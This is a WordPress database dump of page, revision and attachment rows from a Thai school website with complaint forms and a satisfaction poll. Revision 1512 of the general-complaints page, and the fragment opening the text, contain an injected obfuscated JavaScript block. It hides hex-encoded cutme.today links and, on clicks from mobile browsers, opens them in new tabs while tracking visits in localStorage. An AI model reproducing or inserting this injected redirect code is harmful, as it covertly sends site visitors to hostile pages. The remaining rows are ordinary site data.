_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ช่องทางการร้องเรียนเรื่องทั่วไป','','inherit','closed','closed','','484-revision-v1','','','2025-07-01 10:17:35','2025-07-01 03:17:35','',484,'http://pakhaeng.ssk.in.th/?p=1511',0,'revision','',0),
(1512,1,'2025-07-01 10:17:37','2025-07-01 03:17:37','<!-- wp:image {\"id\":1509,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353-1.png\" alt=\"\" class=\"wp-image-1509\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:shortcode -->\n[forminator_form id=\"1506\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ช่องทางการร้องเรียนเรื่องทั่วไป','','inherit','closed','closed','','484-revision-v1','','','2025-07-01 10:17:37','2025-07-01 03:17:37','',484,'http://pakhaeng.ssk.in.th/?p=1512',0,'revision','',0),
(1513,1,'2025-07-01 10:18:22','2025-07-01 03:18:22','','ร้องเรียนทุจริตประพฤติมิชอบ-1024x353','','inherit','','closed','','%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4','','','2025-07-01 10:18:22','2025-07-01 03:18:22','',476,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1.png',0,'attachment','image/png',0),
(1514,1,'2025-07-01 10:18:31','2025-07-01 03:18:31','<!-- wp:image {\"id\":1513,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1.png\" alt=\"\" class=\"wp-image-1513\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:shortcode -->\n[forminator_form id=\"1416\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','476-revision-v1','','','2025-07-01 10:18:31','2025-07-01 03:18:31','',476,'http://pakhaeng.ssk.in.th/?p=1514',0,'revision','',0),
(1515,1,'2025-07-01 10:18:33','2025-07-01 03:18:33','<!-- wp:image {\"id\":1513,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1.png\" alt=\"\" class=\"wp-image-1513\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:shortcode -->\n[forminator_form id=\"1416\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','476-revision-v1','','','2025-07-01 10:18:33','2025-07-01 03:18:33','',476,'http://pakhaeng.ssk.in.th/?p=1515',0,'revision','',0),
(1516,1,'2025-07-01 10:49:54','2025-07-01 03:49:54','','%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%9e%e0%b8%b6%e0%b8%87%e0%b8%9e%e0%b8%ad%e0%b9%83%e0%b8%88%e0%b9%83%e0%b8%99%e0%b8%81%e0%b8%b2','','publish','closed','closed','','%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%9e%e0%b8%b6%e0%b8%87%e0%b8%9e%e0%b8%ad%e0%b9%83%e0%b8%88%e0%b9%83%e0%b8%99%e0%b8%81%e0%b8%b2','','','2025-07-01 11:17:31','2025-07-01 04:17:31','',0,'http://pakhaeng.ssk.in.th/?post_type=forminator_polls&#038;p=1516',0,'forminator_polls','',0),
(1517,1,'2025-07-01 10:42:12','2025-07-01 03:42:12','','ประเมิน-1024x353','','inherit','','closed','','%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99-1024x353','','','2025-07-01 10:42:12','2025-07-01 03:42:12','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ประเมิน-1024x353-1.jpg',0,'attachment','image/jpeg',0),
(1518,1,'2025-07-01 10:46:20','2025-07-01 03:46:20','','1','','inherit','','closed','','1-4','','','2025-07-01 10:46:20','2025-07-01 03:46:20','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/1.png',0,'attachment','image/png',0),
(1519,1,'2025-07-01 10:46:21','2025-07-01 03:46:21','','2','','inherit','','closed','','2-5','','','2025-07-01 10:46:21','2025-07-01 03:46:21','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/2.png',0,'attachment','image/png',0),
(1520,1,'2025-07-01 10:46:23','2025-07-01 03:46:23','','3','','inherit','','closed','','3','','','2025-07-01 10:46:23','2025-07-01 03:46:23','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/3.png',0,'attachment','image/png',0),
(1521,1,'2025-07-01 10:46:25','2025-07-01 03:46:25','','4','','inherit','','closed','','4','','','2025-07-01 10:46:25','2025-07-01 03:46:25','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/4.png',0,'attachment','image/png',0),
(1522,1,'2025-07-01 10:46:26','2025-07-01 03:46:26','','5','','inherit','','closed','','5-2','','','2025-07-01 10:46:26','2025-07-01 03:46:26','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5.png',0,'attachment','image/png',0),
(1523,1,'2025-07-01 10:51:16','2025-07-01 03:51:16','<!-- wp:image {\"id\":1524,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ประเมิน-1024x353-1-1.jpg\" alt=\"\" class=\"wp-image-1524\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:shortcode -->\n[forminator_poll id=\"1516\"]\n<!-- /wp:shortcode -->','ประเมินความพึงพอใจในการรับบริการ','','publish','closed','closed','','%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%9e%e0%b8%b6%e0%b8%87%e0%b8%9e%e0%b8%ad%e0%b9%83%e0%b8%88%e0%b9%83%e0%b8%99%e0%b8%81%e0%b8%b2','','','2025-07-01 11:51:24','2025-07-01 04:51:24','',0,'http://pakhaeng.ssk.in.th/?page_id=1523',0,'page','',0),
(1524,1,'2025-07-01 10:50:56','2025-07-01 03:50:56','','ประเมิน-1024x353 (1)','','inherit','','closed','','%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99-1024x353-1','','','2025-07-01 10:50:56','2025-07-01 03:50:56','',1523,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ประเมิน-1024x353-1-1.jpg',0,'attachment','image/jpeg',0),
(1525,1,'2025-07-01 10:51:16','2025-07-01 03:51:16','<!-- wp:image {\"id\":1524,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ประเมิน-1024x353-1-1.jpg\" alt=\"\" class=\"wp-image-1524\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:shortcode -->\n[forminator_poll id=\"1516\"]\n<!-- /wp:shortcode -->','ประเมินความพึงพอใจในการรับบริการ','','inherit','closed','closed','','1523-revision-v1','','','2025-07-01 10:51:16','2025-07-01 03:51:16','',1523,'http://pakhaeng.ssk.in.th/?p=1525',0,'revision','',0),
(1526,1,'2025-07-01 10:52:26','2025-07-01 03:52:26','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 